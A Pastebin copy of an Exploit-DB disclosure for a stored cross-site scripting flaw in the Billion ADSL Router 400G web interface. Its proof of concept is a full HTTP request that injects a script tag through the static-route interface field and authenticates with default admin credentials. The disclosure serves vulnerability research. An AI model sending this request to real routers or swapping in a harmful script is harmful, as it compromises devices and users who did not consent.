SHARE
TWEET

EDB-ID-45515

TVT618 Oct 5th, 2018 388 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
  2. # Author: Cakes
  3. # Discovery Date: 2018-09-30
  4. # Vendor Homepage: http://www.billion.com
  5. # Software Link: http://billionfirmware.co.za
  6. # Tested Version: 20151105641
  7. # Tested on OS: Kali Linux
  8. # CVE: N/A
  9.  
  10. # Description:
  11. # Improper input validation on the  router web interface allows attackers add a persistent
  12. # Cross-Site scripting attack on the IP Interface field when adding a new static route.
  13. # Simply intercept a new static route request and add in the XSS
  14.  
  15. # Poc
  16.  
  17. POST /configuration/edit-list.html HTTP/1.1
  18. Host: Target
  19. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
  20. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  21. Accept-Language: en-US,en;q=0.5
  22. Accept-Encoding: gzip, deflate
  23. DNT: 1
  24. Referer: http://Target/configuration/edit-list.html
  25. Authorization: Basic YWRtaW46YWRtaW4=
  26. Connection: close
  27. Content-Type: application/x-www-form-urlencoded
  28. Content-Length: 93
  29.  
  30. nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=<script>alert("Cakes");</script>&cost=1&action=create
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top